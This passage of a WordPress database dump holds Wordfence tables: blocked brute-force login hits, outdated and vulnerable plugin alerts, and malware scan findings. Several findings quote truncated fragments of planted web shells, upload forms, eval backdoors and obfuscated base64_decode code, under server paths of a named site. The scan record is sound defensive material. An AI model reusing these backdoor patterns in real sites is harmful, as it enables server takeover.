User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15302,0.000000,1704882212.378861,'\0\0\0\0\0\0\0\0\0\0\"]B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15303,0.000000,1704882796.290456,'\0\0\0\0\0\0\0\0\0\0>f',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15304,0.000000,1704883527.911400,'\0\0\0\0\0\0\0\0\0\0J',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15305,0.000000,1704883612.826197,'\0\0\0\0\0\0\0\0\0\0Uu',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15300,0.000000,1704880900.564265,'\0\0\0\0\0\0\0\0\0\0>B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL); /*!40000 ALTER TABLE `wpvt_wfhits` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfhoover` -- DROP TABLE IF EXISTS `wpvt_wfhoover`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfhoover` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `owner` text DEFAULT NULL, `host` text DEFAULT NULL, `path` text DEFAULT NULL, `hostKey` varbinary(124) DEFAULT NULL, PRIMARY KEY (`id`), KEY `k2` (`hostKey`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfhoover` -- LOCK TABLES `wpvt_wfhoover` WRITE; /*!40000 ALTER TABLE `wpvt_wfhoover` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wfhoover` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfissues` -- DROP TABLE IF EXISTS `wpvt_wfissues`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfissues` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `time` int(10) unsigned NOT NULL, `lastUpdated` int(10) unsigned NOT NULL, `status` varchar(10) NOT NULL, `type` varchar(20) NOT NULL, `severity` tinyint(3) unsigned NOT NULL, `ignoreP` char(32) NOT NULL, `ignoreC` char(32) NOT NULL, `shortMsg` varchar(255) NOT NULL, `longMsg` text DEFAULT NULL, `data` text DEFAULT NULL, PRIMARY KEY (`id`), KEY `lastUpdated` (`lastUpdated`), KEY `status` (`status`), KEY `ignoreP` (`ignoreP`), KEY `ignoreC` (`ignoreC`) ) ENGINE=MyISAM AUTO_INCREMENT=1192 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfissues` -- LOCK TABLES `wpvt_wfissues` WRITE; /*!40000 ALTER TABLE `wpvt_wfissues` DISABLE KEYS */; INSERT INTO `wpvt_wfissues` (`id`, `time`, `lastUpdated`, `status`, `type`, `severity`, `ignoreP`, `ignoreC`, `shortMsg`, `longMsg`, `data`) VALUES (1177,1704989104,1704989104,'new','wfPluginUpgrade',50,'064e9f5c0625994b6b245c17444cef68','064e9f5c0625994b6b245c17444cef68','The Plugin \"LiteSpeed Cache\" needs an upgrade (5.7 -> 6.0.0.1).','You need to upgrade \"LiteSpeed Cache\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:15:\"LiteSpeed Cache\";s:9:\"PluginURI\";s:75:\"https://www.litespeedtech.com/products/cache-plugins/wordpress-acceleration\";s:7:\"Version\";s:3:\"5.7\";s:11:\"Description\";s:66:\"High-performance page caching and site optimization from LiteSpeed\";s:6:\"Author\";s:22:\"LiteSpeed Technologies\";s:9:\"AuthorURI\";s:29:\"https://www.litespeedtech.com\";s:10:\"TextDomain\";s:15:\"litespeed-cache\";s:10:\"DomainPath\";s:5:\"/lang\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:15:\"LiteSpeed Cache\";s:10:\"AuthorName\";s:22:\"LiteSpeed Technologies\";s:10:\"pluginFile\";s:89:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/litespeed-cache.php\";s:4:\"slug\";s:15:\"litespeed-cache\";s:10:\"newVersion\";s:7:\"6.0.0.1\";s:5:\"wpURL\";s:45:\"https://wordpress.org/plugins/litespeed-cache\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(1178,1704989104,1704989104,'new','wfPluginUpgrade',100,'d17470886aa767fffd28c7047f24bf57','d17470886aa767fffd28c7047f24bf57','The Plugin \"MailMunch - Grow Your Email List\" needs an upgrade (3.1.2 -> 3.1.6).','You need to upgrade \"MailMunch - Grow Your Email List\" to the newest version to ensure you have any security fixes the developer has released.','a:26:{s:4:\"Name\";s:32:\"MailMunch - Grow Your Email List\";s:9:\"PluginURI\";s:24:\"http://www.mailmunch.com\";s:7:\"Version\";s:5:\"3.1.2\";s:11:\"Description\";s:176:\"The best free plugin to get more email subscribers. Beautiful signup forms and landing pages that integrate with MailChimp, Constant Contact, AWeber, Campaign Monitor and more.\";s:6:\"Author\";s:9:\"MailMunch\";s:9:\"AuthorURI\";s:24:\"http://www.mailmunch.com\";s:10:\"TextDomain\";s:9:\"mailmunch\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:32:\"MailMunch - Grow Your Email List\";s:10:\"AuthorName\";s:9:\"MailMunch\";s:10:\"pluginFile\";s:77:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/mailmunch/mailmunch.php\";s:4:\"slug\";s:9:\"mailmunch\";s:10:\"newVersion\";s:5:\"3.1.6\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/mailmunch\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/f6409626-c8cb-412c-aff3-cbb2da212e5d?source=plugin\";s:9:\"cvssScore\";s:3:\"4.3\";s:13:\"severityColor\";s:7:\"#f9a009\";s:13:\"severityLabel\";s:6:\"Medium\";s:13:\"severityClass\";s:32:\"wf-vulnerability-severity-medium\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\";}'),(1179,1704989104,1704989104,'new','wfPluginUpgrade',50,'fd9700710658d93704e02c616d0f4595','fd9700710658d93704e02c616d0f4595','The Plugin \"PHP Compatibility Checker\" needs an upgrade (1.6.2 -> 1.6.3).','You need to upgrade \"PHP Compatibility Checker\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:25:\"PHP Compatibility Checker\";s:9:\"PluginURI\";s:20:\"https://wpengine.com\";s:7:\"Version\";s:5:\"1.6.2\";s:11:\"Description\";s:128:\"The WP Engine PHP Compatibility Checker can be used by any WordPress website on any web host to check PHP version compatibility.\";s:6:\"Author\";s:9:\"WP Engine\";s:9:\"AuthorURI\";s:21:\"https://wpengine.com/\";s:10:\"TextDomain\";s:14:\"wpe-php-compat\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"5.6\";s:11:\"RequiresPHP\";s:3:\"5.6\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:25:\"PHP Compatibility Checker\";s:10:\"AuthorName\";s:9:\"WP Engine\";s:10:\"pluginFile\";s:102:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/php-compatibility-checker/wpengine-phpcompat.php\";s:4:\"slug\";s:25:\"php-compatibility-checker\";s:10:\"newVersion\";s:5:\"1.6.3\";s:5:\"wpURL\";s:55:\"https://wordpress.org/plugins/php-compatibility-checker\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(1188,1704989104,1704989104,'new','wfThemeUpgrade',50,'e907bd492e370422a1134edfc2916668','e907bd492e370422a1134edfc2916668','The Theme \"Twenty Twenty\" needs an upgrade (1.1 -> 2.4).','You need to upgrade \"Twenty Twenty\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"2.4\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.2.4.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:4:\"Name\";s:13:\"Twenty Twenty\";s:4:\"name\";s:13:\"Twenty Twenty\";s:7:\"version\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;}'),(1189,1704989104,1704989104,'new','wfThemeUpgrade',50,'6b019e6f2e745939d3043f2c427057d6','6b019e6f2e745939d3043f2c427057d6','The Theme \"Twenty Twenty-One\" needs an upgrade (1.9 -> 2.0).','You need to upgrade \"Twenty Twenty-One\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"2.0\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.2.0.zip\";s:3:\"URL\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:4:\"Name\";s:17:\"Twenty Twenty-One\";s:4:\"name\";s:17:\"Twenty Twenty-One\";s:7:\"version\";s:3:\"1.9\";s:10:\"vulnerable\";b:0;}'),(1190,1704989104,1704989104,'new','wfThemeUpgrade',50,'acefaa93f47b24ea4f25e6204427f461','acefaa93f47b24ea4f25e6204427f461','The Theme \"Twenty Twenty-Three\" needs an upgrade (1.2 -> 1.3).','You need to upgrade \"Twenty Twenty-Three\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.3\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.3.zip\";s:3:\"URL\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:4:\"Name\";s:19:\"Twenty Twenty-Three\";s:4:\"name\";s:19:\"Twenty Twenty-Three\";s:7:\"version\";s:3:\"1.2\";s:10:\"vulnerable\";b:0;}'),(1191,1704989104,1704989104,'new','wfThemeUpgrade',50,'d48775e93e3ca0643e92177daa356b0d','d48775e93e3ca0643e92177daa356b0d','The Theme \"Twenty Twenty-Two\" needs an upgrade (1.5 -> 1.6).','You need to upgrade \"Twenty Twenty-Two\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.6\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.6.zip\";s:3:\"URL\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:4:\"Name\";s:17:\"Twenty Twenty-Two\";s:4:\"name\";s:17:\"Twenty Twenty-Two\";s:7:\"version\";s:3:\"1.5\";s:10:\"vulnerable\";b:0;}'),(1180,1704989104,1704989104,'new','wfPluginUpgrade',50,'b2c07141773a990f909314283f7fec0c','b2c07141773a990f909314283f7fec0c','The Plugin \"Smash Balloon Instagram Feed\" needs an upgrade (6.2.4 -> 6.2.7).','You need to upgrade \"Smash Balloon Instagram Feed\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:28:\"Smash Balloon Instagram Feed\";s:9:\"PluginURI\";s:39:\"https://smashballoon.com/instagram-feed\";s:7:\"Version\";s:5:\"6.2.4\";s:11:\"Description\";s:72:\"Display beautifully clean, customizable, and responsive Instagram feeds.\";s:6:\"Author\";s:13:\"Smash Balloon\";s:9:\"AuthorURI\";s:25:\"https://smashballoon.com/\";s:10:\"TextDomain\";s:14:\"instagram-feed\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:28:\"Smash Balloon Instagram Feed\";s:10:\"AuthorName\";s:13:\"Smash Balloon\";s:10:\"pluginFile\";s:87:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/instagram-feed.php\";s:4:\"slug\";s:14:\"instagram-feed\";s:10:\"newVersion\";s:5:\"6.2.7\";s:5:\"wpURL\";s:44:\"https://wordpress.org/plugins/instagram-feed\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(1153,1704985559,1704985559,'new','file',100,'86af3d1ee3fd25fcf64ccf30b7a4d117','99032573fc07430909bfb3f29f86f8a9','File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/bsP@x7root.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> \\x0d\\x0a</form> </center></td></tr> </table><br>'; \\x0d\\x0aif (!empty ($_FILES['uploads'])) { \\x0d\\x0a move_uploaded_file($...

The issue type is: Suspicious:PHP/uploadform.6890
Description: Compact code to upload files. Can be suspicious','a:9:{s:4:\"file\";s:56:\"wp-content/plugins/backup-backup/includes/bsP@x7root.php\";s:8:\"realFile\";s:91:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/bsP@x7root.php\";s:4:\"shac\";s:64:\"E7C49BFB8486A29AAFF1A7FE7E90EA8A0BFCA391BD0D62C815F8D4A3A5FE194D\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1154,1704985559,1704985559,'new','file',100,'30b3ce91f20353ffae329b941fa5939b','16cf65a01d835e6b07aff9687c2a54d4','File appears to be malicious or unsafe: settings.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <input type="file" name="filename"><br> \\x0d\\x0a <input type="submit" value="Upload"><br>\\x0d\\x0a </form>\\x0d\\x0a<?php\\x0d\\x0a\\x0d\\x0a if(is_uploaded_file($_FILES["filename"]["tmp_name"]))\\x0d\\x0a {\\x0d\\x0a move_uploaded_fil...

The issue type is: Suspicious:PHP/uploadform.6890
Description: Compact code to upload files. Can be suspicious','a:9:{s:4:\"file\";s:12:\"settings.php\";s:8:\"realFile\";s:47:\"/home/tummmyov/tummyrevolution.com/settings.php\";s:4:\"shac\";s:64:\"B62403F257FD514C0CB5D9C1D16183C4683BE172195134A1B99D009A5D743FF1\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1155,1704985559,1704985559,'new','file',100,'022cbd3cc1ccc4444ae9fcd882e10093','93967150dffce259d9ae01c24afd1bc1','File appears to be malicious or unsafe: wp-admin/TFWk17JbsY5.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: eval($BawQS($opwRr(

The issue type is: Backdoor:PHP/evalfnfn.5760
Description: Backdoor used to remotely control a server','a:9:{s:4:\"file\";s:24:\"wp-admin/TFWk17JbsY5.php\";s:8:\"realFile\";s:59:\"/home/tummmyov/tummyrevolution.com/wp-admin/TFWk17JbsY5.php\";s:4:\"shac\";s:64:\"00FD943B12CED604B7A878B23295DF277325F6BD53AACF9F9D320163393F2A3D\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1156,1704985559,1704985559,'new','file',100,'ff828e58c57762e700a6defbb05e9090','5e80b204299976ef05d9ca66d75e1831','File appears to be malicious or unsafe: wp-admin/network/theme-insnqkr.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php error_reporting(0); if (isset($_POST['fname'])){ rename(trim($_POST['fname']), trim($_POST['sname'])); exit; }elseif(isset($_POST['message'])){ $b4 = 'ba'.'se64'.'_d'.'ecode'; fwrite(

The issue type is: Obfuscated:PHP/base64decode.10972
Description: Obfuscation of a function call.','a:9:{s:4:\"file\";s:34:\"wp-admin/network/theme-insnqkr.php\";s:8:\"realFile\";s:69:\"/home/tummmyov/tummyrevolution.com/wp-admin/network/theme-insnqkr.php\";s:4:\"shac\";s:64:\"B334EE27AF98460C7AD6B5154F08A69CF46AE782B7E00CCFC0B30D192F45B345\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1157,1704985559,1704985559,'new','file',100,'0ca8e195603621935a4c0fffd2087753','072f36186706c1d78aa36e8fb70db964','File appears to be malicious or unsafe: wp-includes/7BwY2shWSAb.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: eval($CYJvk($UVQoD(

The issue type is: Backdoor:PHP/evalfnfn.5760
Description: Backdoor used to remotely control a server','a:9:{s:4:\"file\";s:27:\"wp-includes/7BwY2shWSAb.php\";s:8:\"realFile\";s:62:\"/home/tummmyov/tummyrevolution.com/wp-includes/7BwY2shWSAb.php\";s:4:\"shac\";s:64:\"3D850966C889AAA4208D0A507AAD5FB5A3C9C3B4E43DA0B301DEA098B9A9EEDE\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1185,1704989104,1704989104,'new','wfThemeUpgrade',50,'4751b3bbc6e48adb7aff1c8e5cbbaf9c','4751b3bbc6e48adb7aff1c8e5cbbaf9c','The Theme \"Twenty Nineteen\" needs an upgrade (1.4 -> 2.7).','You need to upgrade \"Twenty Nineteen\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"2.7\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.7.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:4:\"Name\";s:15:\"Twenty Nineteen\";s:4:\"name\";s:15:\"Twenty Nineteen\";s:7:\"version\";s:3:\"1.4\";s:10:\"vulnerable\";b:0;}'),(1186,1704989104,1704989104,'new','wfThemeUpgrade',50,'962ca146deaa733dd04b581803c4d074','962ca146deaa733dd04b581803c4d074','The Theme \"Twenty Seventeen\" needs an upgrade (2.2 -> 3.4).','You need to upgrade \"Twenty Seventeen\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"3.4\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.3.4.zip\";s:3:\"URL\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:4:\"Name\";s:16:\"Twenty Seventeen\";s:4:\"name\";s:16:\"Twenty Seventeen\";s:7:\"version\";s:3:\"2.2\";s:10:\"vulnerable\";b:0;}'),(1187,1704989104,1704989104,'new','wfThemeUpgrade',50,'971cffa32c57ca06234237931adec861','971cffa32c57ca06234237931adec861','The Theme \"Twenty Sixteen\" needs an upgrade (2.0 -> 3.1).','You need to upgrade \"Twenty Sixteen\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"3.1\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.3.1.zip\";s:3:\"URL\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:4:\"Name\";s:14:\"Twenty Sixteen\";s:4:\"name\";s:14:\"Twenty Sixteen\";s:7:\"version\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}'),(1184,1704989104,1704989104,'new','wfPluginUpgrade',100,'83b170ca0e63f0e97e19a1774a539d6e','83b170ca0e63f0e97e19a1774a539d6e','The Plugin \"WPBakery Page Builder\" needs an upgrade (6.1 -> 7.3).','You need to upgrade \"WPBakery Page Builder\" to the newest version to ensure you have any security fixes the developer has released.','a:26:{s:4:\"Name\";s:21:\"WPBakery Page Builder\";s:9:\"PluginURI\";s:19:\"http://wpbakery.com\";s:7:\"Version\";s:3:\"6.1\";s:11:\"Description\";s:157:\"Drag and drop page builder for WordPress. Take full control over your WordPress site, build any layout you can imagine – no programming knowledge required.\";s:6:\"Author\";s:24:\"Michael M - WPBakery.com\";s:9:\"AuthorURI\";s:19:\"http://wpbakery.com\";s:10:\"TextDomain\";s:11:\"js_composer\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:21:\"WPBakery Page Builder\";s:10:\"AuthorName\";s:24:\"Michael M - WPBakery.com\";s:10:\"pluginFile\";s:81:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/js_composer.php\";s:4:\"slug\";s:11:\"js_composer\";s:10:\"newVersion\";s:3:\"7.3\";s:5:\"wpURL\";s:0:\"\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/1fab5d06-ff39-4b7c-808b-bd199c2a3329?source=plugin\";s:9:\"cvssScore\";s:3:\"6.4\";s:13:\"severityColor\";s:7:\"#f9a009\";s:13:\"severityLabel\";s:6:\"Medium\";s:13:\"severityClass\";s:32:\"wf-vulnerability-severity-medium\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\";}'),(1182,1704989104,1704989104,'new','wfPluginUpgrade',100,'a2ce136e2b11fc1552d01aace19dd3c0','a2ce136e2b11fc1552d01aace19dd3c0','The Plugin \"WooCommerce\" needs an upgrade (8.2.0 -> 8.4.0).','You need to upgrade \"WooCommerce\" to the newest version to ensure you have any security fixes the developer has released.','a:26:{s:4:\"Name\";s:11:\"WooCommerce\";s:9:\"PluginURI\";s:24:\"https://woocommerce.com/\";s:7:\"Version\";s:5:\"8.2.0\";s:11:\"Description\";s:63:\"An eCommerce toolkit that helps you sell anything. Beautifully.\";s:6:\"Author\";s:10:\"Automattic\";s:9:\"AuthorURI\";s:23:\"https://woocommerce.com\";s:10:\"TextDomain\";s:11:\"woocommerce\";s:10:\"DomainPath\";s:16:\"/i18n/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"6.2\";s:11:\"RequiresPHP\";s:3:\"7.4\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:11:\"WooCommerce\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"pluginFile\";s:81:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/woocommerce.php\";s:4:\"slug\";s:11:\"woocommerce\";s:10:\"newVersion\";s:5:\"8.4.0\";s:5:\"wpURL\";s:41:\"https://wordpress.org/plugins/woocommerce\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/eb8517bc-f45f-40a1-ae80-ed227c8b32d7?source=plugin\";s:9:\"cvssScore\";s:3:\"4.3\";s:13:\"severityColor\";s:7:\"#f9a009\";s:13:\"severityLabel\";s:6:\"Medium\";s:13:\"severityClass\";s:32:\"wf-vulnerability-severity-medium\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\";}'),(1183,1704989104,1704989104,'new','wfPluginUpgrade',50,'fe36850fba6c330d58865b615ea58776','fe36850fba6c330d58865b615ea58776','The Plugin \"Wordfence Security\" needs an upgrade (7.10.4 -> 7.11.1).','You need to upgrade \"Wordfence Security\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:18:\"Wordfence Security\";s:9:\"PluginURI\";s:25:\"http://www.wordfence.com/\";s:7:\"Version\";s:6:\"7.10.4\";s:11:\"Description\";s:58:\"Wordfence Security - Anti-virus, Firewall and Malware Scan\";s:6:\"Author\";s:9:\"Wordfence\";s:9:\"AuthorURI\";s:25:\"http://www.wordfence.com/\";s:10:\"TextDomain\";s:9:\"wordfence\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:3:\"3.9\";s:11:\"RequiresPHP\";s:3:\"5.5\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:18:\"Wordfence Security\";s:10:\"AuthorName\";s:9:\"Wordfence\";s:10:\"pluginFile\";s:77:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/wordfence.php\";s:4:\"slug\";s:9:\"wordfence\";s:10:\"newVersion\";s:6:\"7.11.1\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wordfence\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(1181,1704989104,1704989104,'new','wfPluginUpgrade',50,'e65112e16e1b5f628662489afa24cdf9','e65112e16e1b5f628662489afa24cdf9','The Plugin \"W3 Total Cache\" needs an upgrade (2.5.0 -> 2.6.1).','You need to upgrade \"W3 Total Cache\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:14:\"W3 Total Cache\";s:9:\"PluginURI\";s:36:\"https://www.boldgrid.com/totalcache/\";s:7:\"Version\";s:5:\"2.5.0\";s:11:\"Description\";s:244:\"The highest rated and most complete WordPress performance plugin. Dramatically improve the speed and user experience of your site. Add browser, page, object and database caching as well as minify and content delivery network (CDN) to WordPress.\";s:6:\"Author\";s:8:\"BoldGrid\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:14:\"w3-total-cache\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:3:\"5.3\";s:11:\"RequiresPHP\";s:3:\"5.6\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:14:\"W3 Total Cache\";s:10:\"AuthorName\";s:8:\"BoldGrid\";s:10:\"pluginFile\";s:87:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/w3-total-cache.php\";s:4:\"slug\";s:14:\"w3-total-cache\";s:10:\"newVersion\";s:5:\"2.6.1\";s:5:\"wpURL\";s:44:\"https://wordpress.org/plugins/w3-total-cache\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(1145,1704985326,1704985326,'new','knownfile',75,'f130c617d3530b63398dfa10cd00073b','b4423c58e807f0c267948d3031f4fba6','Unknown file in WordPress core: wp-includes/index.htm','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker.
Learn More (opens in new tab)','a:6:{s:4:\"file\";s:21:\"wp-includes/index.htm\";s:8:\"realFile\";s:56:\"/home/tummmyov/tummyrevolution.com/wp-includes/index.htm\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(1146,1704985326,1704985326,'new','knownfile',75,'6a8d3282b5fcba86922f78c312f961f7','da451bc4cef8e36191eb6b40b16b290c','Unknown file in WordPress core: wp-includes/index.html','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. Learn More (opens in new tab)','a:6:{s:4:\"file\";s:22:\"wp-includes/index.html\";s:8:\"realFile\";s:57:\"/home/tummmyov/tummyrevolution.com/wp-includes/index.html\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(1147,1704985326,1704985326,'new','knownfile',75,'d77218eb4588c03227c063fe7242dae9','6d18352c1df8abd61497c952fcbf8cd5','Unknown file in WordPress core: wp-includes/index.php','This file is 